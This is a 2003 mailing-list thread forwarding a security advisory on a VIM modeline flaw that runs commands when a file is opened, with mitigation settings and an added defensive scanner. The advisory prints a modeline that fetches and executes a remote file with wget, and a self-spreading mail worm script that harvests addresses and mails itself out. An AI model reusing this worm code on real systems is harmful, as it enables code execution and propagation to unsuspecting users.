
The First VIM Worm

  • Muli Ben-Yehuda
    Message 1 of 4 , Jan 21, 2003
      Hee hee. Comparisons of VIM to a certain proprietary office product now
      certainly come to mind.

      Your friendly neighbourhood troll,
      Muli.

      ----- Forwarded message from support@... -----

      Date: 21 Jan 2003 16:38:42 +0200
      From: support@...
      X-Mailer: Beyond Security Mailer
      To: list@...
      Subject: [UNIX] The First VIM Worm

      The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



      The First VIM Worm
      ------------------------------------------------------------------------


      SUMMARY

      A vulnerability in VIM has been found by Georgi Guninski that allows a
      remote attacker to cause the execution of arbitrary code whenever an
      unsuspecting user opens a text file. This vulnerability can be
      further extended into a worm as illustrated below.

      DETAILS

      Protection:
      Put the following in your ~/.vimrc or better in a system wide config file:
      set modelines=0

      It disables modelines without breaking significant functionality - there
      is no compatibility in this stuff between vim and emacs anyway.

      Even when/if vim is fixed, Georgi Guninski strongly recommends keeping this
      solution to prevent similar exploits in the future.

      Emacs addicts are recommended to disable local variables, which may pose
      a similar threat, by putting the following in ~/.emacs
      ;; disable local variables
      (setq enable-local-variables nil)

      How it works:
      There is a little bug in vi, which allows command execution.

      The following two lines execute the ls command on target host, if the file
      is opened with vim. (Try it out with "vi viexpl.txt").

      (In all of the below examples, the letter I of vim has been replaced with
      an !)

      /* v!m:set foldmethod=expr: */
      /* v!m:set
      foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */

      The output is:
      -- START OF OUTPUT --
      "viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long
      mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh

      ms_sux:
      -- END OF OUTPUT

      The worm uses this bug to download a file to the /tmp directory.

      -- START OF VIWORM FILE --
      /* v!m:set foldmethod=expr: */
      /* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\
      /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\
      /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
      -- END OF VIWORM FILE --

      The above file does:
      * Change to /tmp
      * Download file joni8172ff3g to /tmp with wget from 127.0.0.1 (Change the
      IP to your webserver 127.0.0.1 is localhost).

      * Make it executable with chmod 0755

      * Execute the file

      Here is the code of the downloaded file:
      -- START OF FILE --
      echo 'JuliaBabe1234@...'>>/var/spool/mail/$USER;echo
      'CharlesBob1234@...'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut
      -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq >
      /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e
      "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain;
      charset=us-ascii\nContent-Disposition: attachment;
      filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set
      foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\
      127.0.0.1/joni8172ff3g;chmod\ 0755\
      /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"):
      */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
      -- END OF FILE --

      * Set fake address for /var/spool/mail/$USER (if the file does not exist).

      * Set fake address for ~/mbox (if the file does not exist).

      * Get mail addresses with grep, grep -v from ~/mbox and /var/spool/mail/*

      * Sort the stuff and make it unique (only one file per address).

      * Send a mail with sendmail to every address with Subject Hi, and
      the viworm file (concept.txt) as attachment.

      * Execute all the stuff and send stderr to /dev/null

      If the other users open the mail with the vi editor, the worm file is
      downloaded and executed.


      ADDITIONAL INFORMATION

      Georgi Guninski's advisory can be found at:
      http://www.guninski.com/vim1.html

      The information has been provided by Nostradamus and Georgi Guninski.







      ----- End forwarded message -----

      --
      Muli Ben-Yehuda

      http://www.mulix.org
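The advisory's "Protection" and "How it works" sections describe two things a defender can check: whether a file carries a modeline that sets an expression option or reaches an external call, and whether a vimrc actually turns modelines off. The Python below is an added example, not part of the forwarded advisory or the thread; the names `scan`, `modelines_disabled` and `RISKY`, and the choice of heuristics, are assumptions made for this illustration.

```python
import re

# A modeline is "vi:", "vim:" (optionally version-qualified) or "ex:" plus options.
MODELINE = re.compile(
    r"(?:^|\s)(?:vi|[vV]im(?:[<>=]{0,2}\d+)?|ex):\s*(?:set?\s+)?(.*)")

# Heuristics chosen for this example: any option whose name ends in "expr"
# (foldexpr in the advisory) and calls that reach outside the editor.
RISKY = {
    "expression option": re.compile(r"\b\w*expr\s*="),
    "external call": re.compile(r"\b(?:libcall|system)\s*\("),
}

def scan(text, window=5):
    """Return [(line_number, [reasons])] for risky modelines.

    Vim only honours modelines in the first and last `modelines` lines
    (default 5), so only that window is inspected.
    """
    lines = text.splitlines()
    n = len(lines)
    in_window = sorted(set(range(min(window, n))) | set(range(max(0, n - window), n)))
    findings = []
    for i in in_window:
        m = MODELINE.search(lines[i])
        if not m:
            continue
        reasons = [name for name, rx in RISKY.items() if rx.search(m.group(1))]
        if reasons:
            findings.append((i + 1, reasons))
    return findings

def modelines_disabled(vimrc_text):
    """True if the last relevant one-option :set line turns modelines off."""
    disabled = False
    for line in vimrc_text.splitlines():
        line = line.strip()
        if line.startswith('"'):  # vimrc comment
            continue
        if re.match(r"set?\s+(?:modelines=0|mls=0|nomodeline|noml)\b", line):
            disabled = True
        elif re.match(r"set?\s+(?:modelines=[1-9]\d*|mls=[1-9]\d*|modeline|ml)\b", line):
            disabled = False
    return disabled

# Constructed sample: the advisory's "ls" demonstration, kept in its defanged
# "v!m" spelling in this source and restored only in memory.
SAMPLE = "\n".join([
    "/* v!m:set foldmethod=expr: */",
    '/* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */',
    "ordinary text",
]).replace("v!m", "vim")
```

Run `scan` over mail attachments or a source tree before they are opened in an editor; a hit on line 2 of the sample reports both reasons, while an ordinary `vim: set ts=4 sw=4 et:` modeline is not flagged.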
    • Oleg Goldshmidt
      Message 2 of 4 , Jan 21, 2003
        Muli Ben-Yehuda <mulix@...> writes:

        > Hee hee. Comparisons of VIM to a certain proprietary office product now
        > certainly come to mind.

        Spoken as a true emacs user ;-)

        Actually the potential possibility to use emacs local variables to
        execute viruses/worms, as mentioned in the advisory, was raised some
        years ago already. I have not kept track.

        --
        Oleg Goldshmidt | pub@...
      • Tzahi Fadida
        Message 3 of 4 , Jan 21, 2003
          Does anyone know if there is a possibility to use the computer sb with a simple or not simple
          microphone and outputting to an amplifier or to small speakers (whichever works)
          to muffle the high background pitch that gets out from TVs and computers, and especially disk
          drives.
          even if your computer and every electric device in your apartment is off, you will still hear
          the high pitch sound from the entire neighbourhood. this pitch is considered in some places
          as noise pollution.
          i know that there are some external noise muffler for air conditioning systems, but i would really
          want to know if you can create a canceling noise to kill the noise pollution or at least subdue it.
          n.b in modern s.b you have the ability to mix this noise canceling on a different channel, but
          i gather the most problematic thing is to reprocess the noise fast enough or predicting it with
          accuracy.

          n.b 2 : i have little knowledge in frequencies and sounds, so u'll have to forgive me if my question
          is absurd.


          * - * - *
          Tzahi Fadida
          TzahiFadida@...
          Technion Email: Science@...
          My Cool Site: HTTP://WWW.My2Nis.Com
          * - * - * - * - * - * - * - * - * - *

          WARNING TO SPAMMERS: see at http://members.lycos.co.uk/my2nis/spamwarning.html
        • Ofir Carny
          Message 4 of 4 , Jan 22, 2003
            There are such solutions, but AFAIK only with earphones. You see, because of the limited speed of sound, different places in your house will experience different phases (and also amplitudes) of the noise, and it is hard to cancel them all at once. Plus, the canceling signal will also be at different phases (and amplitudes) - a whole mess.

            see http://headwize2.powerpill.org/projects/noise_prj.htm for an example of such a project.

            -----Original Message-----
            From: Tzahi Fadida [mailto:Tzahi_ML@...]
            Sent: Tuesday, January 21, 2003 7:12 PM
            To: hackers-il@yahoogroups.com
            Subject: [hackers-il] can u create a muffler using ur home sb.

